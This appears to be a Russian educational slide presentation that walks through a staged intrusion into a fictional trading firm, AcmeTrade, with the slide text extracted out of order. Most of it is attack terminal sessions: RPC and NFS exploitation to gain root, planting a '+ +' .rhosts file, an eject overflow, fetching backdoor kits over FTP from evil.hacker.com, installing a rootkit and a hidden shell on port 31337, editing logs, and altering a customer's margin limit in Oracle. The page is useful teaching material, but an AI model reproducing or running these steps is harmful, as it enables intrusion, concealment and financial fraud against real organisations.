Презентация "Пример сетевой атаки" по информатике – проект, доклад

Пример атаки

ACMETRADE.COM

Registrant: Acmetrade.com, Inc. (ACMETRADE-DOM) 6600 Peachtree Dunwoody Road Atlanta, GA 30338 Domain Name: ACMETRADE.COM Administrative Contact: Vaughn, Danon (ES2394) dvaughn@ACMETRADE.COM (678)443-6000 (FAX) (678) 443-6476 Technical Contact, Zone Contact: Bergman, Bret (ET2324) bbergman@ACMETRADE.COM (678)443-6100 (FAX) (678) 443-6208 Billing Contact: Fields, Hope (ET3427) hfields@ACMETRADE.COM (678)443-6101 (FAX) (678) 443-6401 Record Last updated on 27-Jul-99. Record created on 06-Mar-98. Database last updated on 4-Oct-99 09:09:01 EDT Domain servers in listed order: dns.acmetrade.com 208.21.2.67 www.acmetrade.com 208.21.2.10 www1.acmetrade.com 208.21.2.12 www2.acmetrade.com 208.21.2.103

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com

hacker:/export/home/hacker> ./rpcscan dns.acmetrade.com cmsd

Scanning dns.acmetrade.com for program 100068 cmsd is on port 33505

id uid=1002(hacker) gid=10(staff) uname -a

SunOS evil.hacker.com 5.6 Generic_105181-05 sun4u sparc SUNW,UltraSPARC-IIi-Engine

./cmsd dns.acmetrade.com

using source port 53 rtable_create worked Exploit successful. Portshell created on port 33505

Trying 208.21.2.67... Connected to dns.acmetrade.com. Escape character is '^]'.

uid=0(root) gid=0(root)

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

telnet dns.acmetrade.com 33505

nslookup

Default Server: dns.acmetrade.com Address: 208.21.2.67

> ls acmetrade.com Received 15 records. ^D [dns.acmetrade.com]

www.acmetrade.com 208.21.2.10 www1.acmetrade.com 208.21.2.12 www2.acmetrade.com 208.21.2.103 margin.acmetrade.com 208.21.4.10 marketorder.acmetrade.com 208.21.2.62 deriv.acmetrade.com 208.21.2.25 deriv1.acmetrade.com 208.21.2.13 bond.acmetrade.com 208.21.2.33 ibd.acmetrade.com 208.21.2.27 fideriv.acmetrade.com 208.21.4.42 backoffice.acmetrade.com 208.21.4.45 wiley.acmetrade.com 208.21.2.29 bugs.acmetrade.com 208.21.2.89 fw.acmetrade.com 208.21.2.94 fw1.acmetrade.com 208.21.2.21

rpcinfo -p www.acmetrade.com | grep mountd

100005 1 udp 643 mountd 100005 1 tcp 647 mountd

showmount -e www.acmetrade.com

/usr/local server2, server3, server4 /export/home sunspot

rpcinfo -p www1.acmetrade.com | grep mountd

showmount -e www1.acmetrade.com

/data1 server2 /a engineering /b engineering /c engineering /export/home (everyone)

export list for www.acmetrade.com:

nfs

nfsshell.c

Export list for www1.acmetrade.com:

nfs> mount /export/home

Mount www1.acmetrade.com[208.21.2.12]:/export/home

ls

bill bob celeste chuck dan dave jenn zack

ls –l bob

drwxr-xr-x 2 201 1 1024 May 4 1999 bob

- protocol: UDP/IP - transfer size: 8192 bytes

cd bob uid 201 gid 1 nfsshell host www1.acmetrade.com

Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP

export

status

User id : 201 Group id : 1 Remote host : ‘www1.acmetrade.com’ Mount path : ‘/export/home’ Transfer size: 8192

!sh echo "+ +" > .rhosts exit put .rhosts cat .rhosts + + rlogin -l bob www1.acmetrade.com

Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com

www1% whoami bob pwd /export/home/bob

SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000

ls -la /usr/bin/eject

-r-sr-xr-x 1 root bin 13144 Jul 15 1997 /usr/bin/eject*

gcc -o eject_overflow eject_overflow.c

./eject_overflow

Jumping to address 0xeffff630 B[364] E[400] SO[400]

root ftp evil.hacker.com Connected to evil.hacker.com. Name (evil.hacker.com:root):

331 Password required for hacker.

Password: 230 User hacker logged in. Remote system type is UNIX.

Using binary mode to transfer files.

hacker eye0wnu

220 evil.hacker.com FTP server (HackerOS) ready.

ftp> cd solaris_backdoors 250 CWD command successful. get solaris_backdoor.tar.gz 200 PORT command successful.

150 Binary data connection for out 3.1.33.7,1152).

226 Transfer complete.

152323 bytes sent in 31.942233 secs (4.7Kbytes/sec)

quit tar -xf module_backdoor.tar cd /tmp/my_tools gunzip module_backdoor.tar.gz

cd /tmp/my_tools/module_backdoor ./configure

Enter directories and filenames to hide from ls, find, du:

make

gcc -c backdoor.c gcc -o installer installer.c ld –o backdoor –r backdoor.o

Makefile backdoor backdoor.c backdoor.o config.h configure installer installer.c

modload backdoor

./installer -d /usr/local/share/...

Adding directory... Fixing last modified time... Fixing last accessed time...

... backdoor

Enter class C network to hide from netstat:

Enter process names to hide from ps and lsof:

creating config.h... 3.1.33.0 sniffer

ls -la /usr/local/share/... ...: No such file or directory

./installer backdoor /usr/local/share/.../backdoor

Installing file... Fixing last modified time... Fixing last accessed time...

echo "/usr/sbin/modload /usr/local/share/.../backdoor" >>/etc/init.d/utmpd

cd .. rm -rf module_backdoor inetd_backdoor/ logedit sniffer

./installer sniffer /usr/local/share/.../sniffer

ls /usr/local/share/.../sniffer

/usr/local/share/.../sniffer: No such file or directory

cd /usr/local/share/... ./sniffer > out & ps -aef | grep sniffer

netstat

TCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State -------------------- -------------------- ----- ------ ----- ------ ------- 208.21.2.10.1023 208.21.0.19.2049 8760 0 8760 648 ESTABLISHED 208.21.2.10.1022 208.21.0.19.2049 8760 0 8760 0 ESTABLISHED 208.21.2.10.2049 208.21.0.13.1003 8760 0 8760 0 ESTABLISHED

cd inetd_backdoor

config.h configure inetd.c installer.c

Enter port for hidden shell:

gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv gcc -o installer installer.c

installer inetd /usr/sbin/inetd

creating config.h... creating Makefile...

31337

Trying 208.21.2.12... Escape character is '^]'.

telnet www1.acmetrade.com 31337 Granting rootshell... hostname www1 ps –aef | grep inetd

root 179 1 0 May 10 ? 1:26 /usr/sbin/inetd -s

kill –9 179 /usr/sbin/inetd –s &

Connection closed by foreign host.

ftp www1.acmetrade.com

Connected to www1 220 www1.acmetrade.com FTP service (Version 2.5).

Name: 331 Password required for root. ******* 230 User root logged in. Remote system type is Unix.

put backdoor.html securelogin.html

150 Opening BINARY mode data connection for index.html

200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls. total 10 -rwxr-xr-x 9 root other 1024 Aug 17 17:07 . -rwxr-xr-x 9 root other 1024 Aug 17 17:07 .. -rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html -rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html -rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif -rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif -rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg 226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)

dir ftp> cd /usr/local/httpd

program vers proto port service 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind 100004 2 udp 753 ypserv 100004 1 udp 753 ypserv 100004 1 tcp 754 ypserv 100004 2 tcp 32771 ypserv 1073741824 2 udp 32772 100007 3 udp 32779 ypbind 100007 2 udp 32779 ypbind 100007 1 udp 32779 ypbind 100007 3 tcp 32772 ypbind 100007 2 tcp 32772 ypbind 100007 1 tcp 32772 ypbind 100011 1 udp 32781 rquotad 100068 2 udp 32783 100068 3 udp 32783 100068 4 udp 32783 100068 5 udp 32783 100024 1 udp 32784 status 100024 1 tcp 32777 status 100021 1 udp 4045 nlockmgr 100021 2 udp 4045 nlockmgr

rpcinfo -p backoffice.acmetrade.com

100021 3 udp 4045 nlockmgr 100021 4 udp 4045 nlockmgr 100021 1 tcp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100021 3 tcp 4045 nlockmgr 100021 4 tcp 4045 nlockmgr 100005 1 udp 33184 mountd 100005 2 udp 33184 mountd 100005 3 udp 33184 mountd 100005 1 tcp 32787 mountd 100005 2 tcp 32787 mountd 100005 3 tcp 32787 mountd 100083 1 tcp 32773 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100227 2 udp 2049 nfs_acl 100227 3 udp 2049 nfs_acl 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100227 2 tcp 2049 nfs_acl 100227 3 tcp 2049 nfs_acl

grep ttdbserverd /etc/inetd.conf

100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd

rpcinfo -p backoffice.acmetrade.com | grep 100083

100083 1 tcp 32773 cd /tmp/mytools/warez

Please wait for your root shell. ./tt backoffice.acmetrade.com backoffice

find / -type f -name .rhosts -print

/.rhosts /export/home/chuck/.rhosts /export/home/bill/.rhosts /export/home/larry/.rhosts

cat /.rhosts

fideriv.acmetrade root ibd.acmetrade root bugs.acmetrade root

w

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty login@ idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh root pts/5 9:24pm /sbin/sh

/tmp/mytools/logedit root pts/5

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03 User tty login@ idle JCPU PCPU what root console 9:27am 147:52 14:41 14:14 /sbin/sh

sqlplus oracle/oracle SQL> describe customers

Name Null? Type ------------------ -------- ----------- LNAME NOT NULL VARCHAR2(20) FNAME NOT NULL VARCHAR2(15) ADDR1 NOT NULL VARCHAR2(30) ZIP NOT NULL NUMBER(5) PHONE NOT NULL CHAR(12) ACCOUNT_NUM NOT NULL NUMBER(12) BALANCE NOT NULL NUMBER(12) MARGIN_LIMIT NOT NULL NUMBER(12) ACCT_OPEN NOT NULL DATE SQL>

select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME FNAME ACCOUNT_NUM MARGIN_LIMIT -------------------- ------------- ----------- ------------ Gerulski David 5820981 50000.00 SQL>

update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski';

select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME MARGIN_LIMIT ------------------- ------------ Gerulski 500000.00 SQL>

Anatomy of the Attack AcmeTrade’s Network UNIX Firewall DNS Server Web Server Filtering Router NT Clients & Workstations Network UNIX rpc.cmsd nfs / eject tooltalk /oracle

IT Infrastructure Firewall E-Mail Server Router Servers What is Vulnerable?

Applications E-Commerce Web Server SAP Peoplesoft Web Browsers

Databases Oracle Microsoft SQL Server Sybase

AIX Solaris Windows NT Operating Systems HP-UX Windows 95 & NT

Networks TCP/IP Netware